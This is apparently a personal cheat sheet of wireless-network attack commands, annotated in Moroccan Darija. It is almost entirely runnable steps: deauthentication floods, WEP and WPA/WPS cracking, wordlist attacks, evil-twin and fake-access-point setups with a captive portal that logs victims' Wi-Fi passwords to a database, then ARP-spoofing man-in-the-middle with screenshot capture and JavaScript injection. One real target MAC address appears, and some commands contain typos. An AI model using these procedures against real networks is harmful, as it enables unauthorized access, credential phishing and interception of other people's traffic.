
	ifconfig wlan0 down (had lcommand khassha tkon qbl ma dir chi taghyir ela antenna)
	ifconfig wlan0 hw ether 00::11::22::33::44::55 (pach tchangi mac address dyal antenna)
	iwconfig (katlisti lk wirless devices bla details )
	iwconfig wlan0 down (had lcommand khassha tkon qbl ma dir chi taghyir ela antenna)
	airmon-ng check kill (bach tqtoll ay processe momkin ykhasr lk monitor mode)
	iwconfig wlan0 mode monitor
	
	######
	interface name: wlx0026222f50d1 
	00:26:22:2f:50:d1
	########
	target : F4:F6:47:09:65:A0

	##packet sniffing
  airodump-ng (wireless adapter in monitor mode)
  airodump-ng --bssid (bssid) --channel (ch) --write (file name) (wireless adapter in monitor mode)
  mnbed qlb ela lfile li fih *.cap ftho mea wireshark

	##Deathentication Attack
  aireplay-ng --deauth [#DeauthPackets (khtar chi raqm kbir)] -a [NetworkMac (mac da router)] -c [TargetMac] [Interface]

	##Gaining Access (Wep cracking)
qalb ela had l'algorithme RC4 (hadi katkon f router li mazal khdamin b WEP)
awal haja khdm bhadi airodump-ng --bssid (bssid) --channel (ch) --write (file name) (wireless adapter in monitor mode)
mn bed khdm b aircrack-ng (lfile li fih .cap)

	##Fake authentication (katkhdmha fhalt kan dak network machi busy )
arpreplay attack
awl haja katsnifi l packets b airodump-ng --bssid ...
mn baed katkhdm blatack li hya arpreplay-ng
arpreplay-ng --fakeauth 0(ch7al dlwaqt bach yeawd y authentify) -a [mac da router] -h [mac dyal interface dyalk] [name da interface]
arpreplay-ng --arpreplay  -b [mac da router] -h [mac dyal interface dyalk] [name da interface] (hadi ghadirha mn baed)
mnbed arpreplay-ng --fakeauth ... safi wflkhr aircrack-ng (lfile li fih .cap)

	##korek chop chop attack
another method to crack WEP
works with weak signals
1. determine packet they stream
2. forge new packet
3. inject it in the traffic
awl haja katsnifi l packets b airodump-ng --bssid ...
arpreplay-ng --chopchop  -b [mac da router] -h [mac dyal interface dyalk] [name da interface] (mn baed ghatsjl dak iv f wahd lfile)
packetforge-ng -0 -a [mac da router] -h [mac dyal interface dyalk] -k (broadcast) -l 255.255.255.255 -y (hna lfile li fih .xor) -w [hna smya dyal packet lowla]
kima katerf eawd dir fake authentication
arpreplay-ng -2 -r [hna smya dyal packet lowla] [name da interface]
safi wflkhr aircrack-ng (lfile li fih .cap)

	##packet injection attack (fragmentation attack)
qalb ela PRGA
kima leada  katsnifi l packets b airodump-ng --bssid ... 
mn baed kadir fake authentication
mn bed kankhdmo lattack dyalna
arpreplay-ng --fragment  -b [mac da router] -h [mac dyal interface dyalk] [name da interface]
kima katerf eawd dir fake authentication
packetforge-ng -0 -a [mac da router] -h [mac dyal interface dyalk] -k 255.255.255.255 -l 255.255.255.255 -y (hna lfile li fih .xor) -w [hna smya dyal packet lowla]
kima katerf eawd dir fake authentication
arpreplay-ng -2 -r [hna smya dyal packet lowla] [name da interface]
safi wflkhr aircrack-ng (lfile li fih .cap)


	##WPA/WPA2 cracking
awl haja qalb wach WPS khdama knqlbo eliha b
 wash --interface [interface name(monitor mode)]
 mn baed kadir fake authentication
arpreplay-ng --fakeauth 30(ch7al dlwaqt bach yeawd y authentify) -a [mac da router] -h [mac dyal interface dyalk] [name da interface]
had lcommand jaya kandiroha ela wd ybqa yjrb f l pin 
 reaver --bssid (bssid) --channel (ch) --interface [interface name] -vvv (hadi bach yetik lmaelomat ) --no-associate(hadi mn lahsan dirha hit nta dija kadirha)
 yla tlae lk chi mochkil qalb ela versions lqdam dyal reaver mn baed chmod +x reaver ./reaver --bssid (bssid) --channel (ch) --interface [interface name] -vvv (hadi bach yetik lmaelomat ) --no-associate(hadi mn lahsan dirha hit nta dija kadirha)
db fhalt mkanch khdam
 airodump-ng [interface]
 airodump-ng --bssid .. --channel ... --write ... [interface name]
 arpreplay-ng aireplay-ng --deauth [#DeauthPackets (khtar chi raqm sghir hna)] -a [NetworkMac (mac da router)] -c [TargetMac] [Interface]
      	##Creating a wordlist
 crunch [min] [max] [characters] -o [filename] -t [pattern] 
example: crunch 6 8 123abc$ -o wordlist -t a@@@@b
 aircrack-ng (lfile li fih .cap) -w [wordlist dyalk]

 	##cracking the key using airolib-ng
 1.create database and import wordlist
 > airolib-ng [db_name] --import passwd [wordlist]
hna ghadir had lcomand echo "[target essid]"> smi lfile li bghiti
 2.import target essid
 > airolib-ng [db_name] --import essid [essid-file]
 3.compute PMK for the wordlist
 > airolib-ng [db_name] --batch
 4.Crack the key using the PMK database
 > aircrack-ng -r [db_name] [handshake_file]
		##evil twin attack
 airbase-ng -e <bssid> --essid <essid> -c channel wlan0mon
 ip link add name <name (ex:ha)> type bridge
 ip link set <name (ex:ha)> up
 ip link set eth0 master <name (ex:ha)>
 ip link set at0 master <name (ex:ha)>
 dhclient <name (ex:ha)> &
 aireplay-ng --deauth 10000 -a <bssid> wlan0mon --ignore-negative-one

		##fake access point another method
         		#--preparing--#
 apt-get update
 apt-get install hostapd dnsmasq apache2
 nano hostapd.conf
                       #--instructions for hostapd.conf:
 interface <interface name>
 driver=rtl(rak earf)
 ssid=<wifi name>
 hw_mode=g
 channel=qalb ela channel da target
 macaddr_acl=0
 ignore_broadcast_ssid=0 (mn bed dir save)
   
   nano dnsmasq.conf
                   #--instructions for dnsmasq.conf:
  interface <interface name>
  dhcp-range=192.168.68.2,192.168.68.30,255.255.255.0,12h
  dhcp-option=3,192.168.68.1
  dhcp-option=6,192.168.68.1
  server=8.8.8.8
  log-queries
  log-dhcp
  listen-address=127.0.0.1
   		  #--routing table and gateway:
  ifconfig wlan0mon up 192.168.68.1 netmask 255.255.255.0
  route add -net 192.168.68.0 netmask 255.255.255.0 gw 192.168.68.1
  		  #--internet access:
  iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
  iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
  echo 1 > /proc/sys/net/ipv4/ip_forward
  		  #--mysql database:
 service mysql start
 mysql
 create database fap;
 
 create user fapuser;
 grant all on rogueap*to 'fapuser'@'localhost' identified by 'fappassword;
 use fap;
 create table wpa_keys(password1 varchar(40),password2 varchar(40));
 ALTER DATABASE fap CHARACTER SET 'utf8';
 select*from wpa_keys;
 		   #-- captive portal setup:
 rm -rf /var/www/html
 mv fap.zip /var/www/html
 cd /var/www/html
 unzip fap.zip
 service apache2 start
		    #--starting the attack:
  hostapdf hostapdf.conf
  dnsmasq -C dnsmasq.conf -d
dnsspoof -i wlan0mon
 

		##fluxion (lhal)pyrit
 sudo apt-get install libssl-dev python2-dev
 sudo apt-get install libpcap-dev
 python setup.py build
 python setup.py install
		##mana-toolkit (fake access point)
 >apt-get install mana-toolkit
 >nano /etc/mana-toolkit/hostapd-mana.conf
 >nano /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
 >bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
		##post-connection
 >netdiscover -r [range d network 192.168.68.1/24]
 >nmap/zenmap(interface)
    nmap -T4 -A -v [range d network] (intence scan)
    nmap -sn  [range d network] (ping scan)
    nmap -T4 -F  [range d network] (quick scan katetik lports)
    nmap -sV -T4 -O -F --version-light  [range d network] (quick scan plus)
    
    
		##ssh
 ssh root@ip(victim li khdam endo ssh)
		         ##----MITM attack:
                ##arp spoofing
 >arpspoof -i [interfac] -t [clientIp] [gatewayIp] (for victim)
 >arpspoof -i [interfac] -t [gateawayIp] [clientIp] (for router)
  (khask t enable port forwarding <echo 1 > /proc/sys/net/ipv4/ip_forward>
	        ##MITMF (install it first apt-get install mitmf)
 >mitmf --arp --spoof --gateway ... --target ... -i [interface]
 ----------------------------------------------------------------------------
 >service apache2 start
 >nano /etc/mitmf/mitmf.conf (bdl li bghiti)
 >mitmf --arp --spoof --gateway ... --target ... -i [interface] --dns
 -------------------------------------------------------------------------------------
 >>mitmf --arp --spoof --gateway ... --target ... -i [interface] --screen (bash takhod screen shot --interval timing mabin kol screen ghatlqa screenshots f /var/log/mitmf)
 -------------------------------------------------------------------------------------
 >mitmf --arp --spoof -i [interface] --gateway ... --target ...  --inject --js-payload "your code here"
		##wifiphisher
 
 












